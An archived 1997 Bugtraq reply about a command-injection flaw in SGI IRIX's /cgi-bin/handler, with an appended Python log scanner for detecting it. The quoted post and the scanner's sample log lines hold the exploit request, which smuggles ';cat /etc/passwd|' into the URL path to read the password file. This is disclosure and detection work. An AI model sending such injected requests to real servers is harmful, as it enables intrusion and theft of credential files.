Bugtraq mailing list archives
Re: Bug in SGI's /cgi-bin/handler
From: yarony () vipe technion ac il (Yaron Yanay)
Date: Sun, 15 Jun 1997 13:49:01 +0300
On Sun, 15 Jun 1997, Razvan Dragomirescu wrote:

:The way to exploit this "feature" for cgi-bin/handler is:
:telnet target.machine.com 80
:GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download
:HTTP/1.0
:I tested it on two Indy machines with IRIX 6.2. I would appreciate any
:feedback from you.

It worked on my IRIX 5.3 machines.

my fix:
chmod 0 /var/www/cgi-bin

Yaron.

                      \\\|///
                    \\  - -  //
                     (  @ @  )
+-----------------------oOOo-(_)-oOOo-------------+
| Yaron Yanay. email:yarony () yarony il eu org   |
|                    yarony () tx technion ac il  |
|              http://www.technion.ac.il/~yarony  |
|              http://yarony.il.eu.org            |
+-------------------------------Oooo--------------+
                        oooO   (   )
                       (   )    ) /
                        \ (    (_/
                         \_)
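A log check for the request pattern quoted above, as an added example that is not part of the original post: it flags Common Log Format entries where the PATH_INFO after /cgi-bin/handler contains shell metacharacters, raw or percent-encoded. The log lines, addresses and the SHELL_META set are constructed for illustration, and the access log is assumed to be in Common Log Format.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status size
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+')
HANDLER = "/cgi-bin/handler"
SHELL_META = set(";|&`$<>(){}\t\r\n")  # assumed set of characters a shell treats specially

# Constructed sample entries (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jun/1997:10:02:11 +0300] "GET /index.html HTTP/1.0" 200 2310',
    '192.0.2.44 - - [15/Jun/1997:10:05:37 +0300] "GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0" 200 1482',
    '192.0.2.44 - - [15/Jun/1997:10:06:02 +0300] "GET /cgi-bin/handler/useless_shit%3Bcat%20/etc/passwd%7C?data=Download HTTP/1.0" 200 1482',
    '192.0.2.10 - - [15/Jun/1997:10:07:40 +0300] "GET /cgi-bin/handler/docs/readme.txt?data=Download HTTP/1.0" 200 912',
    '192.0.2.77 - - [15/Jun/1997:10:09:13 +0300] "GET /cgi-bin/search?q=a;b HTTP/1.0" 200 100',
]

def split_request(request):
    """Return (method, target). The target may contain raw spaces when typed by hand."""
    method, _, rest = request.partition(" ")
    target, sep, proto = rest.rpartition(" ")
    if not sep or not proto.upper().startswith("HTTP/"):
        target = rest  # no protocol token (HTTP/0.9 style): everything is the target
    return method, target

def suspicious_path_info(target):
    """Return sorted shell metacharacters found in PATH_INFO after the handler, else []."""
    decoded = unquote(target.split("?", 1)[0])  # drop query string, then decode %XX
    if not decoded.startswith(HANDLER):         # prefix match on purpose: prefer false positives
        return []
    return sorted(SHELL_META.intersection(decoded[len(HANDLER):]))

def scan(lines):
    """Return (line_no, host, status, metacharacters) for each flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CLF.match(line)
        if not m:
            continue  # not a CLF entry
        _, target = split_request(m.group("request"))
        found = suspicious_path_info(target)
        if found:
            hits.append((n, m.group("host"), m.group("status"), "".join(found)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("line %d: host=%s status=%s metachars=%r" % hit)
```

A 200 status on a flagged entry means the server answered the request, so that host's later activity is worth reviewing first.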